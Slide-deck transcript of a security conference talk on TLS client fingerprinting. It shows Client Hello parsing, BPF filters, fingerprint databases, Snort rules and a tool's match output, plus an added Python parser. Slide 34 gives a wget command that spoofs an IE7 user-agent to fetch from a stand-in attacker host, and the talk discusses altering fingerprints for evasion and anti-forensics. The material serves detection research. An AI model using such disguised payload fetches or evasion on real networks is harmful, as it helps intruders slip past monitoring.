TLS Fingerprinting SecTorCA Edition
The slides to accompany my SecTorCA talk on TLS Fingerprinting (Stealthier Attacks & Smarter Defending)

Published in: Technology
  • TLS Fingerprinting is brilliant! TLS certificates are the best trust anchors we have but we can't afford to blindly trust them. Know what certificates are on your network where!

  1. Stealthier Attacks & Smarter Defending with TLS Fingerprinting. Lee Brotherston, @synackpse #TLSFP
  2. … A “Zero Math, (almost) Zero Crypto” TLS Talk. Lee Brotherston, @synackpse #TLSFP
  3. TLS PRIMER….. (Shhhh…. it’s not a cryptographic algorithm)
  4. Diagram: Client and Server. Kittens…….. Unicorn Tears, Pixie Dust; TCP: SYN, TCP: SYN/ACK, TCP: ACK
  5. Diagram: Client and Server. Client Hello, Server Hello, Client Key Exchange, Change Cipher Spec, Change Cipher Spec, Encrypted Data
  6. Fingerprints
  7. Why Clients?
  8. Server-side cipher configuration examples:
      SSLCipherSuite RC4-SHA:AES128-SHA:HIGH:!aNULL:!MD5
      SSLHonorCipherOrder on
      smtpd_tls_mandatory_ciphers = high
      smtpd_tls_mandatory_exclude_ciphers = aNULL, MD5
      smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3
      smtpd_tls_mandatory_protocols = TLSv1
      ssl_cipher_list = ALL:!LOW:!SSLv2:!EXP:!aNULL
  9. Origin Story
  10. Expanding…
  11. Client Hello layout: Content Type, Version, Length, Handshake Type, Length, Version, Random, Session ID Length, Session ID, Cipher Suites Length, Cipher Suites, Compression Methods Length, Compression Methods, Extensions
  12. Client Hello layout: Content Type, Version, Length, Handshake Type, Length, Version, Random, Session ID Length, Session ID, Cipher Suites Length, Cipher Suites, Compression Methods Length, Compression Methods, Extensions
  13. Extensions
  14. Significant, key-value order is!
  15. Creating a FingerPrint
  16. Fingerprint record:
      {
        "id": 0,
        "desc": "Dropbox (Win 8.1)",
        "record_tls_version": "0x0301",
        "tls_version": "0x0301",
        "ciphersuite_length": "0x0010",
        "ciphersuite": "0xC014 0xC013 0xC011 0x0039 0x0033 0x0035 0x002F 0x00FF",
        "compression_length": "1",
        "compression": "0x00",
        "extensions": "0x0000 0x0023",
        "server_name": "client-lb.dropbox.com"
      }
  17. Deobfuscation
  18. ssh -p443 user@myhost (don’t pretend you don’t)
  19. Any Port ✓ Stateless ✓ Asymmetric ✓ Low Cost ✓
  20. BPF filter (record and handshake major version 3 or 0):
      tcp[tcp[12]/16*4]=22
      and (tcp[tcp[12]/16*4+5]=1)
      and ((tcp[tcp[12]/16*4+9]=3) or (tcp[tcp[12]/16*4+9]=0))
      and ((tcp[tcp[12]/16*4+1]=3) or (tcp[tcp[12]/16*4+1]=0))
  21. BPF filter (record and handshake major version 3 only):
      tcp[tcp[12]/16*4]=22
      and (tcp[tcp[12]/16*4+5]=1)
      and (tcp[tcp[12]/16*4+9]=3)
      and (tcp[tcp[12]/16*4+1]=3)
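An added example, not code from the talk or from the FingerprinTLS project: it applies the same checks as the slide 21 BPF filter (TCP data offset from tcp[12], record type 0x16, handshake type 0x01, major version 3) and then walks the Client Hello layout of slides 11 to 16 to produce a record with the same keys as slide 16. The sample Client Hello, the TCP header in front of it and the builder that assembles them are constructed here; the parser also handles a longer TCP header (options) and a Client Hello without extensions, which the slides do not show.

```python
import json
import struct


def client_hello_from_segment(segment: bytes) -> bytes:
    """Python equivalent of the slide 21 BPF filter: tcp[12]/16*4 is the TCP
    data offset, byte 0 of the payload must be 0x16 (handshake), byte 5 must be
    0x01 (Client Hello) and bytes 1 and 9 (major versions) must be 3."""
    if len(segment) < 20:
        return b""
    p = segment[(segment[12] >> 4) * 4:]
    if len(p) < 11 or p[0] != 0x16 or p[5] != 0x01 or p[1] != 3 or p[9] != 3:
        return b""
    return p


def fingerprint(p: bytes, desc: str = "unknown") -> dict:
    """Pull out the fields the talk fingerprints on, preserving wire order."""
    u16 = lambda b: struct.unpack("!H", b)[0]
    i = 11 + 32                                  # skip headers and the 32-byte Random
    i += 1 + p[i]                                # Session ID is not part of the fingerprint
    cs_len = u16(p[i:i + 2]); i += 2
    ciphers = [u16(p[j:j + 2]) for j in range(i, i + cs_len, 2)]; i += cs_len
    comp_len = p[i]; i += 1
    comps = list(p[i:i + comp_len]); i += comp_len
    exts, sni = [], ""
    if i + 2 <= len(p):                          # the extensions block is optional
        end = i + 2 + u16(p[i:i + 2]); i += 2
        while i + 4 <= end:
            etype, elen = struct.unpack("!HH", p[i:i + 4]); i += 4
            body = p[i:i + elen]; i += elen
            exts.append(etype)                   # order matters, so keep the list order
            if etype == 0 and len(body) >= 5:    # server_name: list len, name type, name len, name
                sni = body[5:5 + u16(body[3:5])].decode("ascii", "replace")
    return {
        "id": 0, "desc": desc,
        "record_tls_version": "0x%02X%02X" % (p[1], p[2]),
        "tls_version": "0x%02X%02X" % (p[9], p[10]),
        "ciphersuite_length": "0x%04X" % cs_len,
        "ciphersuite": " ".join("0x%04X" % c for c in ciphers),
        "compression_length": str(comp_len),
        "compression": " ".join("0x%02X" % c for c in comps),
        "extensions": " ".join("0x%04X" % e for e in exts),
        "server_name": sni,
    }


def build_client_hello(ciphers, exts, record_ver=b"\x03\x01", hs_ver=b"\x03\x01") -> bytes:
    """Constructed sample input: wrap the given suites and extensions in a valid Client Hello."""
    ext_body = b"".join(struct.pack("!HH", t, len(b)) + b for t, b in exts)
    body = hs_ver + bytes(32) + b"\x00"                               # zero Random, empty Session ID
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                                                # one compression method: null
    body += struct.pack("!H", len(ext_body)) + ext_body
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16" + record_ver + struct.pack("!H", len(hs)) + hs


def sni_ext(host: str) -> tuple:
    name = host.encode()
    return (0x0000, struct.pack("!HBH", len(name) + 3, 0, len(name)) + name)


# Constructed Client Hello mimicking the slide 16 "Dropbox (Win 8.1)" record, behind a
# minimal 20-byte TCP header (data offset 5, PSH/ACK), as tcpdump would see it.
SAMPLE = build_client_hello([0xC014, 0xC013, 0xC011, 0x0039, 0x0033, 0x0035, 0x002F, 0x00FF],
                            [sni_ext("client-lb.dropbox.com"), (0x0023, b"")])
SAMPLE_SEGMENT = bytes(12) + b"\x50\x18" + bytes(6) + SAMPLE

if __name__ == "__main__":
    print(json.dumps(fingerprint(client_hello_from_segment(SAMPLE_SEGMENT), "Dropbox (Win 8.1)"), indent=2))
```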
  22. Storage & Retention
  23. Filter stages and packet counts:
                                         Client to Server   Server to Client   Discarded
      Unfiltered                         9547378            3776313            99.226%
      Handshake & Client Hello Filter    51766              59                 2.859%
      1st Byte TLS Version               51677              3                  0.005%
      1st Byte TLS Version (Record)      51677              0                  0.000%
  24. Moving on…..
  25. Own Fingerprint Modification
  26. Collisions? (Car & Photo: @snipeyhead)
  27. Yes… ok no…. sort of….. a bit…. occasionally
  28. Attacker Level 1: Stealth MiTM
  29. ARP Cache Poisoning, DNS Spoofing, BGP Hijacking, Hacked Proxy, Malicious Tor Node, Local Agent, Malicious Provider, Rogue DHCP
  30. TLS Attacks
  31. Diagram: Client, Real Server, Evil Server, Hacker; TCP: SYN, TCP: SYN/ACK, TCP: ACK, Client Hello
  32. Attacker Level 2: AntiForensics
  33. Enumerated Targets ✓ Prepared Exploits ✓ Delivered Stager/Phish ✓ Awaiting Callback …
  34. Meanwhile…
      wget --user-agent="Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" https://evil_url.com/thing/
  35. Diagram: Client, “Legit” Server, Attack Server, Hacker; labels IE7 and wget; TCP: SYN, TCP: SYN/ACK, TCP: ACK, Client Hello
  36. Defender Level 1: Detection
  37. Connection table:
      SRC                  DEST
      192.168.1.37:3847    66.185.84.30:443
      192.168.1.37:44870   74.125.226.150:443
      192.168.1.49:36469   38.229.70.22:6667
      192.168.1.122:51593  54.204.30.235:22
      10.54.107.19:64926   194.54.103.65:22
      10.54.103.99:3010    54.204.30.201:443
      10.54.103.76:3013    64.136.25.171:80
      10.54.103.66:3847    192.168.10.64:25
      10.54.103.33:3009    54.204.30.11:443
      10.54.103.99:3010    192.168.10.10:443
  38. Packet capture:
      $ sudo tcpdump -Xni eth0 host desktop
      16:29:39.149010 IP 10.54.103.76.3010 > 54.204.30.201.443: Flags [P.], seq 826:991, ack 990, win 64, options [nop,nop,TS val 1123747053 ecr 530699601], length 165
      0x0000: 4500 00d9 62a9 4000 3306 586b 36af 939e E...b.@.3.Xk6...
      0x0010: c0a8 0115 01bb c04d 49e3 2eec fb96 5e29 .......MI.....^)
      0x0020: 8018 0040 ff69 0000 0101 080a 42fb 04ed ...@.i......B...
      0x0030: 1fa1 d551 1703 0300 a008 7a4c d2cf 56e3 ...Q......zL..V.
      0x0040: b83a b448 3e23 accd 3495 a547 202a e88a .:.H>#..4..G.*..
      0x0050: f05d 9f25 121a 9e1e 4944 4431 f493 0b4d .].%....IDD1...M
      0x0060: e5fc c83c a77c 0cf6 6adb 96d6 7b05 481d ...<.|..j...{.H.
      0x0070: 84d8 9049 952d d524 6643 00aa ccc7 48d1 ...I.-.$fC....H.
      0x0080: 31d4 d033 d523 39e7 dbcd 5b8f 2204 da9d 1..3.#9...[."...
      0x0090: 66fb ee3d b9c3 2bb2 5649 bdac 240d 4942 f..=..+.VI..$.IB
      0x00a0: f588 e44a 44da 64cd f35c a73b 1bdf d9ac ...JD.d...;....
      0x00b0: 1bad dfc1 4c75 253d dcf0 42f9 452b 1fea ....Lu%=..B.E+..
      0x00c0: d5d9 384b 9d63 804e ccfb 2f08 8404 035d ..8K.c.N../....]
      0x00d0: 269b 0a99 7801 970c 9a &...x....
  39. Probably Browsing ¯\_(ツ)_/¯
  40. Attribution: Alex Pinto, MLSec
  41. Connection table (repeated from slide 37):
      SRC                  DEST
      192.168.1.37:3847    66.185.84.30:443
      192.168.1.37:44870   74.125.226.150:443
      192.168.1.49:36469   38.229.70.22:6667
      192.168.1.122:51593  54.204.30.235:22
      10.54.107.19:64926   194.54.103.65:22
      10.54.103.99:3010    54.204.30.201:443
      10.54.103.76:3013    64.136.25.171:80
      10.54.103.66:3847    192.168.10.64:25
      10.54.103.33:3009    54.204.30.11:443
      10.54.103.99:3010    192.168.10.10:443
  42. Connection table with destinations resolved:
      SRC                  DEST
      192.168.1.37:3847    www.google.com:443
      192.168.1.37:44870   Unknown:443
      192.168.1.49:36469   FreeNode IRC:6667
      192.168.1.122:51593  AWS Something:22
      10.54.107.19:64926   Unknown:22
      10.54.103.99:3010    AWS Something:443
      10.54.103.76:3013    Unknown:80
      10.54.103.66:3847    Internal SMTP:25
      10.54.103.33:3009    AWS Something:443
      10.54.103.99:3010    Sharepoint:443
  43. The same table as slide 42, with client fingerprint labels added: mitmproxy, Tor
  44. “Anomaly Detection”
  45. Not Just Hax0ring
  46. Defender Level 2: Fingerprint Defined Routing
  47. Diagram: Client, Defence, Real Server, Honey Pot; TCP: SYN, TCP: SYN/ACK, TCP: ACK, Client Hello
  48. Defender Level 3: Fingerprint Canaries
  49. Homogeneous Platforms
  50. End Of Level Boss: Nation State Attackers (zomg!)
  51. Honorable Mention: HoneyPots
  52. Tools
  53. FingerprinTLS:
      $ sudo ./ssl_fingerprint/fingerprintls/fingerprintls -i en0 -s
      Password:
      Using interface: en0
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56274 to 104.244.43.39:443 Servername: "pbs.twimg.com"
      Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.5:56281 to 167.114.152.100:443 Servername: "www.i6l66pzauglk2kqx2b.com"
      Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.5:56280 to 37.221.162.226:9001 Servername: "www.jy27vswlheykb2dptady.com"
      Fingerprint Matched: "mutt (tested: 1.5.23 - OS X)" TLSv1.2 connection from 192.168.1.5:56316 to 74.125.69.108:993 Servername: "Not Set"
      Fingerprint Matched: "ThunderBird (v38.0.1 OS X)" TLSv1.2 connection from 192.168.1.5:56394 to 74.125.69.108:993 Servername: "imap.gmail.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56233 to 104.244.43.199:443 Servername: "pbs.twimg.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56236 to 23.195.217.14:443 Servername: "s.mzstatic.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56242 to 184.25.66.217:443 Servername: "itunes.apple.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56243 to 23.195.218.30:443 Servername: "su.itunes.apple.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56246 to 23.21.97.18:443 Servername: "vine.co"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56247 to 184.25.66.217:443 Servername: "init.itunes.apple.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56248 to 104.244.43.229:443 Servername: "v.cdn.vine.co"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56250 to 17.173.66.136:443 Servername: "xp.apple.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56253 to 23.195.217.14:443 Servername: "s.mzstatic.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56259 to 23.195.218.30:443 Servername: "se.itunes.apple.com"
      Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56267 to 104.244.43.167:443 Servername: "pbs.twimg.com"
      Fingerprint Matched: "AppleWebKit/600.7.12 or 600.1.4" TLSv1.2 connection from 192.168.1.5:56273 to 104.244.43.7:443 Servername: "pbs.twimg.com"
  54. Fingerprintout (C struct):
      { 0, "Shodan", 0x0301, 0x0302, 0x0010,
        {0x00,0x14,0x00,0x11,0x00,0x19,0x00,0x08,
         0x00,0x06,0x00,0x17,0x00,0x03,0x00,0xFF},
        1, {0x00},
        4, {0x00,0x23,0x00,0x0F},
        0, {}, 0, {}, 0, {} }
  55. Fingerprintout (Snort rule):
      alert tcp any any -> any any ( msg:"ruby script (tested: 2.0.0p481)";
          content: "|16 03 01|"; offset: 0; depth: 3; rawbytes;
          content: "| 01|"; distance: 1; rawbytes;
          content: "|03 01|"; distance: 3; rawbytes;
          byte_jump: 1,43,align;
          content: "|00 24|"; distance: 0; rawbytes;
          content: "|00 39 00 38 00 35 00 33 00 32 00 2F 00 16 00 13 00 0A 00 9A 00 99 00 96 00 05 00 04 00 15 00 12 00 09 00 FF|"; distance: 0; rawbytes;
          content: "|01 00|"; distance: 0; rawbytes;
          content: "|00 00|"; rawbytes; distance: 2; byte_jump: 2,0,relative;
          content: "|00 23|"; rawbytes; distance: 0;
          sid:1000169; rev:1;)
  56. Fingerprintout (xkeyscore):
      $ ./parse_fingerprint.py ../json/combined.json xkeyscore
      # Rule for "Mozilla/4.0 (compatible; MSIE 6.0 or MSIE 7.0)"
      "\x16\x03\x01.*\x01.*\x03\x01.*
      \x00\x16\x00\x04\x00\x05\x00\x0\x00\x09\x00\x64\x00\x62\x00
      \x03\x00\x06\x00\x13\x00\x12\x00\x63.*\x00"
  57. Fingerprintout (cleanse):
      $ ./parse_fingerprint.py ./combined.json cleanse | grep '#'
      # Oh no, 2 signatures match: Java (tested: v8 Update 60) - Archive.org bot
      # Oh no, 2 signatures match: Archive.org bot - Java (tested: v8 Update 60)
  58. (╯°□°)╯︵ ┻━┻
  59. FingerPrint DB (one record per line; the last record is cut off on the slide):
      {"id": 0, "desc": "MS Word / MS WebDav", "record_tls_version": " 0x0301", "tls_version": "0x0301 ", "ciphersuite_length": "0x0014 ", "ciphersuite": "0xC014 0xC013 0xC00A 0xC009 0x0035 0x002F 0x0038 0x0032 0x000A 0x0013", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0000 0x000A 0x000B 0xFF01", "e_curves": " 0x0019 0x0017 0x0018 ", "sig_alg": " ", "ec_point_fmt": " 0x00 ", "server": "" }
      {"id": 0, "desc": "Internet Explorer 11.0.9600.17959", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x0030 ", "ciphersuite": "0xC028 0xC027 0xC014 0xC013 0x009F 0x009E 0x009D 0x009C 0xC02C 0xC02B 0xC024 0xC023 0xC00A 0xC009 0x003D 0x003C 0x0035 0x002F 0x006A 0x0040 0x0038 0x0032 0x000A 0x0013", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0000 0x0005 0x000A 0x000B 0x000D 0xFF01", "e_curves": " 0x0017 0x0018 0x0019 ", "sig_alg": " 0x0601 0x0603 0x0401 0x0501 0x0201 0x0403 0x0503 0x0203 0x0202 ", "ec_point_fmt": " 0x00 ", "server": "" }
      {"id": 0, "desc": "Pidgin (tested 2.10.11)", "record_tls_version": " 0x0301", "tls_version": "0x0303 ", "ciphersuite_length": "0x0022 ", "ciphersuite": "0xC02B 0xC02F 0xC00A 0xC009 0xC013 0xC027 0xC014 0xC007 0xC011 0x009E 0x0033 0x0032 0x0067 0x0039 0x006B 0x002F 0x0035", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0000 0xFF01 0x000A 0x000B 0x000D", "e_curves": " 0x0017 0x0018 0x0019 ", "sig_alg": " 0x0401 0x0501 0x0201 0x0403 0x0503 0x0203 0x0402 0x0202 ", "ec_point_fmt": " 0x00 ", "server": "" }
      {"id": 0, "desc": "Windows Java Plugin (tested: v8 Update 60)", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x003A ", "ciphersuite": "0xC023 0xC027 0x003C 0xC025 0xC029 0x0067 0x0040 0xC009 0xC013 0x002F 0xC004 0xC00E 0x0033 0x0032 0xC02B 0xC02F 0x009C 0xC02D 0xC031 0x009E 0x00A2 0xC008 0xC012 0x000A 0xC003 0xC00D 0x0016 0x0013 0x00FF", "compression_length": "1 ", "compression": "0x00", "extensions": "0x000A 0x000B 0x000D 0x0000", "e_curves": " 0x0017 0x0001 0x0003 0x0013 0x0015 0x0006 0x0007 0x0009 0x000A 0x0018 0x000B 0x000C 0x0019 0x000D 0x000E 0x000F 0x0010 0x0011 0x0002 0x0012 0x0004 0x0005 0x0014 0x0008 0x0016 ", "sig_alg": " 0x0603 0x0601 0x0503 0x0501 0x0403 0x0401 0x0303 0x0301 0x0203 0x0201 0x0202 0x0101 ", "ec_point_fmt": " 0x00 ", "server": "" }
      {"id": 0, "desc": "Windows 8.x Apps Store thing (unconfirmed)", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x0034 ", "ciphersuite": "0xC028 0xC027 0xC014 0xC013 0x009F 0x009E 0x009D 0x009C 0x003D 0x003C 0x0035 0x002F 0xC02C 0xC02B 0xC024 0xC023 0xC00A 0xC009 0x006A 0x0040 0x0038 0x0032 0x000A 0x0013 0x0005 0x0004", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0000 0x000A 0x000B 0x000D 0x0023 0xFF01", "e_curves": " 0x0017 0x0018 ", "sig_alg": " 0x0401 0x0501 0x0601 0x0201 0x0403 0x0503 0x0603 0x0203 0x0202 ", "ec_point_fmt": " 0x00 ", "server": "" }
      {"id": 0, "desc": "w3c HTML Validator", "record_tls_version": " 0x0301", "tls_version": "0x0303 ", "ciphersuite_length": "0x00AE ", "ciphersuite": "0xC030 0xC02C 0xC028 0xC024 0xC014 0xC00A 0x00A3 0x009F 0x006B 0x006A 0x0039 0x0038 0x0088 0x0087 0xC019 0x00A7 0x006D 0x003A 0x0089 0xC032 0xC02E 0xC02A 0xC026 0xC00F 0xC005 0x009D 0x003D 0x0035 0x0084 0xC012 0xC008 0x0016 0x0013 0xC017 0x001B 0xC00D 0xC003 0x000A 0xC02F 0xC02B 0xC027 0xC023 0xC013 0xC009 0x00A2 0x009E 0x0067 0x0040 0x0033 0x0032 0x009A 0x0099 0x0045 0x0044 0xC018 0x00A6 0x006C 0x0034 0x009B 0x0046 0xC031 0xC02D 0xC029 0xC025 0xC00E 0xC004 0x009C 0x003C 0x002F 0x0096 0x0041 0xC011 0xC007 0xC016 0x0018 0xC00C 0xC002 0x0005 0x0004 0x0014 0x0011 0x0019 0x0008 0x0006 0x0017 0x0003 0x00FF", "compression_length": "2 ", "compression": "0x01 0x00", "extensions": "0x0000 0x000B 0x000A 0x0023 0x000D 0x000F", "e_curves": " 0x000E 0x000D 0x0019 0x000B 0x000C 0x0018 0x0009 0x000A 0x0016 0x0017 0x0008 0x0006 0x0007 0x0014 0x0015 0x0004 0x0005 0x0012 0x0013 0x0001 0x0002 0x0003 0x000F 0x0010 0x0011 ", "sig_alg": " 0x0601 0x0602 0x0603 0x0501 0x0502 0x0503 0x0401 0x0402 0x0403 0x0301 0x0302 0x0303 0x0201 0x0202 0x0203 0x0101 ", "ec_point_fmt": " 0x00 0x01 0x02 ", "server": "" }
      {"id": 0, "desc": "w3c HTML Validator", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x0064 ", "ciphersuite": "0xC024 0xC028 0x003D 0xC026 0xC02A 0x006B 0x006A 0xC00A 0xC014 0x0035 0xC005 0xC00F 0x0039 0x0038 0xC023 0xC027 0x003C 0xC025 0xC029 0x0067 0x0040 0xC009 0xC013 0x002F 0xC004 0xC00E 0x0033 0x0032 0xC02C 0xC02B 0xC030 0x009D 0xC02E 0xC032 0x009F 0x00A3 0xC02F 0x009C 0xC02D 0xC031 0x009E 0x00A2 0xC008 0xC012 0x000A 0xC003 0xC00D 0x0016 0x0013 0x00FF", "compression_length": "1 ", "compression": "0x00", "extensions": "0x000A 0x000B 0x000D 0x0000", "e_curves": " 0x0017 0x0001 0x0003 0x0013 0x0015 0x0006 0x0007 0x0009 0x000A 0x0018 0x000B 0x000C 0x0019 0x000D 0x000E 0x000F 0x0010 0x0011 0x0002 0x0012 0x0004 0x0005 0x0014 0x0008 0x0016 ", "sig_alg": " 0x0603 0x0601 0x0503 0x0501 0x0403 0x0401 0x0303 0x0301 0x0203 0x0201 0x0202 0x0101 ", "ec_point_fmt": " 0x00 ", "server": "" }
      {"id": 0, "desc": "Archive.org bot", "record_tls_version": " 0x0303", "tls_version": "0x0303 ", "ciphersuite_length": "0x003A ", "ciphersuite": "0xC023 0xC027 0x003C 0xC025 0xC029 0x0067 0x0040 0xC009 0xC013 0x002F 0xC004 0xC00E 0x0033 0x0032 0xC02B 0xC02F 0x009C 0xC02D 0xC031 0x009E 0x00A2 0xC008 0xC012 0x000A 0xC003 0xC00D 0x0016 0x0013 0x00FF", "compression_length": "1 ", "compression": "0x00", "extensions": "0x000A 0x000B 0x000D 0x0000", "e_curves": " 0x0017 0x0001 0x0003 0x0013 0x0015 0x0006 0x0007 0x0009 0x000A 0x0018 0x000B 0x000C 0x0019 0x000D 0x000E 0x000F 0x0010 0x0011 0x0002 0x0012 0x0004 0x0005 0x0014 0x0008 0x0016 ", "sig_alg": " 0x0603 0x0601 0x0503 0x0501 0x0403 0x0401 0x0303 0x0301 0x0203 0x0201 0x0202 0x0101 ", "ec_point_fmt": " 0x00 ", "server": "" }
      {"id": 0, "desc": "OpenSSL s-client with -tls1 flag", "record_tls_version": " 0x0301", "tls_version": "0x0301 ", "ciphersuite_length": "0x002E ", "ciphersuite": "0x0039 0x0038 0x0035 0x0016 0x0013 0x000A 0x0033 0x0032 0x002F 0x009A 0x0099 0x0096 0x0005 0x0004 0x0015 0x0012 0x0009 0x0014 0x0011 0x0008 0x0006 0x0003 0x00FF", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0023", "e_curves": " ", "sig_alg": " ", "ec_point_fmt": " ", "server": "" }
      {"id": 0, "desc": "GNUTLS Commandline", "record_tls_version": " 0x0301", "tls_version": "0x0303 ", "ciphersuite_length": "0x0084 ", "ciphersuite": "0xC02B 0xC02C 0xC086 0xC087 0xC009 0xC023 0xC00A 0xC024 0xC072 0xC073 0xC008 0xC007 0xC02F 0xC030 0xC08A 0xC08B 0xC013 0xC027 0xC014 0xC028 0xC076 0xC077 0xC012 0xC011 0x009C 0x009D 0xC07A 0xC07B 0x002F 0x003C 0x0035 0x003D 0x0041 0x00BA 0x0084 0x00C0 0x000A 0x0005 0x0004 0x009E 0x009F 0xC07C 0xC07D 0x0033 0x0067 0x0039 0x006B 0x0045 0x00BE 0x0088 0x00C4 0x0016 0x00A2 0x00A3 0xC080 0xC081 0x0032 0x0040 0x0038 0x006A 0x0044 0x00BD 0x0087 0x00C3 0x0013 0x0066", "compression_length": "1 ", "compression": "0x00", "extensions": "0x0005 0x0000 0xFF01 0x0023 0x000A 0x000B 0x000D", "e_curves": " 0x0017 0x0018 0x0019 0x0015 0x0013 ", "sig_alg": " 0x0401 0x0402 0x0403 0x0501 0x0503 0x0601 0x0603 0x0301 0x0302 0x0303 0x0201
  60. Demo?
  61. Vorführeffekt?
  62. What’s Next?
  63. https://github.com/LeeBrotherston/tls-fingerprinting
      http://www.slideshare.net/leebrotherston
      @synackpse @FingerprinTLS #TLSFP
      📖 https://blog.squarelemon.com/tls-fingerprinting/
  64. Random Observations
  65. Thank you! Lee Brotherston, @synackpse #TLSFP